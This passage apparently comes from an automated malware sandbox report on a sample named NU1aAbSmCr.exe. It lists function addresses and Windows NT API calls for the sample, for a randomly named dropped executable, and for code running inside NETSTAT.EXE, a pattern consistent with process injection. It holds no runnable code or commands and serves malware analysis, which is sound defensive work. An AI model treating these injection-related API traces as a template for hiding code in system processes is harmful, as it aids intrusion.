            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01623D70 NtOpenThread,4_2_01623D70
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01623D10 NtOpenProcessToken,4_2_01623D10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03934340 NtSetContextThread,LdrInitializeThunk,11_2_03934340
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03934650 NtSuspendThread,LdrInitializeThunk,11_2_03934650
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03932BA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03932BF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03932BE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932B60 NtClose,LdrInitializeThunk,11_2_03932B60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932AD0 NtReadFile,LdrInitializeThunk,11_2_03932AD0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932AF0 NtWriteFile,LdrInitializeThunk,11_2_03932AF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932FB0 NtResumeThread,LdrInitializeThunk,11_2_03932FB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932FE0 NtCreateFile,LdrInitializeThunk,11_2_03932FE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932F30 NtCreateSection,LdrInitializeThunk,11_2_03932F30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03932E80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03932EE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932DD0 NtDelayExecution,LdrInitializeThunk,11_2_03932DD0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03932DF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03932D10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03932D30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03932CA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03932C70
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932C60 NtCreateKey,LdrInitializeThunk,11_2_03932C60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039335C0 NtCreateMutant,LdrInitializeThunk,11_2_039335C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039339B0 NtGetContextThread,LdrInitializeThunk,11_2_039339B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932B80 NtQueryInformationFile,11_2_03932B80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932AB0 NtWaitForSingleObject,11_2_03932AB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932F90 NtProtectVirtualMemory,11_2_03932F90
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932FA0 NtQuerySection,11_2_03932FA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932F60 NtCreateProcessEx,11_2_03932F60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932EA0 NtAdjustPrivilegesToken,11_2_03932EA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932E30 NtWriteVirtualMemory,11_2_03932E30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932DB0 NtEnumerateKey,11_2_03932DB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932D00 NtSetInformationFile,11_2_03932D00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932CC0 NtQueryVirtualMemory,11_2_03932CC0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932CF0 NtOpenProcess,11_2_03932CF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03932C00 NtQueryInformationProcess,11_2_03932C00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03933090 NtSetValueKey,11_2_03933090
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03933010 NtOpenDirectoryObject,11_2_03933010
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03933D10 NtOpenProcessToken,11_2_03933D10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03933D70 NtOpenThread,11_2_03933D70
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_030693B0 NtReadFile,11_2_030693B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03069240 NtCreateFile,11_2_03069240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_030696A0 NtAllocateVirtualMemory,11_2_030696A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03069540 NtClose,11_2_03069540
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_030694A0 NtDeleteFile,11_2_030694A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 0_2_00F94B640_2_00F94B64
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 0_2_00F9DE4C0_2_00F9DE4C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 0_2_04F500400_2_04F50040
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 0_2_04F500060_2_04F50006
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 0_2_06ED0CD00_2_06ED0CD0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 0_2_06ED35280_2_06ED3528
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_004189434_2_00418943
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_004010AB4_2_004010AB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_004010B04_2_004010B0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_004101A34_2_004101A3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_004032004_2_00403200
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_00416ADC4_2_00416ADC
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_00416B234_2_00416B23
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_004103C34_2_004103C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0040E4434_2_0040E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_004014704_2_00401470
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_00401D624_2_00401D62
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_00401D704_2_00401D70
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_004045944_2_00404594
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_004026D04_2_004026D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0042EF934_2_0042EF93
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016781584_2_01678158
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E01004_2_015E0100
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168A1184_2_0168A118
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A81CC4_2_016A81CC
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B01AA4_2_016B01AA
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A41A24_2_016A41A2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016820004_2_01682000
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AA3524_2_016AA352
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B03E64_2_016B03E6
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FE3F04_2_015FE3F0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016902744_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016702C04_2_016702C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F05354_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B05914_2_016B0591
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A24464_2_016A2446
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016944204_2_01694420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169E4F64_2_0169E4F6
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F07704_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016147504_2_01614750
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EC7C04_2_015EC7C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160C6E04_2_0160C6E0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016069624_2_01606962
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016BA9A64_2_016BA9A6
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F29A04_2_015F29A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F28404_2_015F2840
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FA8404_2_015FA840
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E8F04_2_0161E8F0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D68B84_2_015D68B8
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AAB404_2_016AAB40
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A6BD74_2_016A6BD7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EEA804_2_015EEA80
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FAD004_2_015FAD00
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168CD1F4_2_0168CD1F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EADE04_2_015EADE0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01608DBF4_2_01608DBF
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0C004_2_015F0C00
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E0CF24_2_015E0CF2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690CB54_2_01690CB5
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01664F404_2_01664F40
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01632F284_2_01632F28
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01610F304_2_01610F30
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01692F304_2_01692F30
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E2FC84_2_015E2FC8
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FCFE04_2_015FCFE0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166EFA04_2_0166EFA0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0E594_2_015F0E59
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AEE264_2_016AEE26
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AEEDB4_2_016AEEDB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01602E904_2_01602E90
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016ACE934_2_016ACE93
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016BB16B4_2_016BB16B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0162516C4_2_0162516C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DF1724_2_015DF172
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FB1B04_2_015FB1B0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A70E94_2_016A70E9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AF0E04_2_016AF0E0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F70C04_2_015F70C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169F0CC4_2_0169F0CC
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DD34C4_2_015DD34C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A132D4_2_016A132D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0163739A4_2_0163739A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016912ED4_2_016912ED
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160B2C04_2_0160B2C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F52A04_2_015F52A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A75714_2_016A7571
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B95C34_2_016B95C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168D5B04_2_0168D5B0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E14604_2_015E1460
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AF43F4_2_016AF43F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AF7B04_2_016AF7B0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016356304_2_01635630
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A16CC4_2_016A16CC
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F99504_2_015F9950
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160B9504_2_0160B950
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016859104_2_01685910
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165D8004_2_0165D800
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F38E04_2_015F38E0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AFB764_2_016AFB76
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01665BF04_2_01665BF0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0162DBF94_2_0162DBF9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160FB804_2_0160FB80
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01663A6C4_2_01663A6C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AFA494_2_016AFA49
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A7A464_2_016A7A46
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169DAC64_2_0169DAC6
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01635AA04_2_01635AA0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168DAAC4_2_0168DAAC
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01691AA34_2_01691AA3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A7D734_2_016A7D73
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F3D404_2_015F3D40
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A1D5A4_2_016A1D5A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160FDC04_2_0160FDC0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01669C324_2_01669C32
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AFCF24_2_016AFCF2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AFF094_2_016AFF09
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015B3FD24_2_015B3FD2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015B3FD54_2_015B3FD5
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F1F924_2_015F1F92
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016AFFB14_2_016AFFB1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F9EB04_2_015F9EB0
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FAC9D110_2_02FAC9D1
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FA2B7A10_2_02FA2B7A
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FB50C210_2_02FB50C2
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FAE9A910_2_02FAE9A9
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FB510910_2_02FB5109
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FAE78910_2_02FAE789
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FB6F2010_2_02FB6F20
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FCD57910_2_02FCD579
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0390E3F011_2_0390E3F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039C03E611_2_039C03E6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BA35211_2_039BA352
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039802C011_2_039802C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039A027411_2_039A0274
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039C01AA11_2_039C01AA
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039B41A211_2_039B41A2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039B81CC11_2_039B81CC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0399A11811_2_0399A118
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_038F010011_2_038F0100
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0398815811_2_03988158
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0399200011_2_03992000
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_038FC7C011_2_038FC7C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0392475011_2_03924750
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0390077011_2_03900770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0391C6E011_2_0391C6E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039C059111_2_039C0591
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0390053511_2_03900535
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039AE4F611_2_039AE4F6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039A442011_2_039A4420
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039B244611_2_039B2446
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039B6BD711_2_039B6BD7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BAB4011_2_039BAB40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_038FEA8011_2_038FEA80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039029A011_2_039029A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039CA9A611_2_039CA9A6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0391696211_2_03916962
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_038E68B811_2_038E68B8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0392E8F011_2_0392E8F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0390A84011_2_0390A840
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0390284011_2_03902840
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0397EFA011_2_0397EFA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_038F2FC811_2_038F2FC8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0390CFE011_2_0390CFE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03920F3011_2_03920F30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039A2F3011_2_039A2F30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03942F2811_2_03942F28
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03974F4011_2_03974F40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03912E9011_2_03912E90
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BCE9311_2_039BCE93
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BEEDB11_2_039BEEDB
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BEE2611_2_039BEE26
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03900E5911_2_03900E59
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03918DBF11_2_03918DBF
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_038FADE011_2_038FADE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0399CD1F11_2_0399CD1F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0390AD0011_2_0390AD00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039A0CB511_2_039A0CB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_038F0CF211_2_038F0CF2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03900C0011_2_03900C00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0394739A11_2_0394739A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039B132D11_2_039B132D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_038ED34C11_2_038ED34C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039052A011_2_039052A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0391B2C011_2_0391B2C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039A12ED11_2_039A12ED
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0390B1B011_2_0390B1B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039CB16B11_2_039CB16B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_038EF17211_2_038EF172
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0393516C11_2_0393516C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039070C011_2_039070C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039AF0CC11_2_039AF0CC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039B70E911_2_039B70E9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BF0E011_2_039BF0E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BF7B011_2_039BF7B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039B16CC11_2_039B16CC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0394563011_2_03945630
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0399D5B011_2_0399D5B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039C95C311_2_039C95C3
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039B757111_2_039B7571
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BF43F11_2_039BF43F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_038F146011_2_038F1460
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0391FB8011_2_0391FB80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03975BF011_2_03975BF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0393DBF911_2_0393DBF9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BFB7611_2_039BFB76
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03945AA011_2_03945AA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0399DAAC11_2_0399DAAC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039A1AA311_2_039A1AA3
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039ADAC611_2_039ADAC6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BFA4911_2_039BFA49
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039B7A4611_2_039B7A46
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03973A6C11_2_03973A6C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0399591011_2_03995910
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0390995011_2_03909950
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0391B95011_2_0391B950
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039038E011_2_039038E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0396D80011_2_0396D800
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03901F9211_2_03901F92
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BFFB111_2_039BFFB1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BFF0911_2_039BFF09
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03909EB011_2_03909EB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0391FDC011_2_0391FDC0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039B1D5A11_2_039B1D5A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03903D4011_2_03903D40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039B7D7311_2_039B7D73
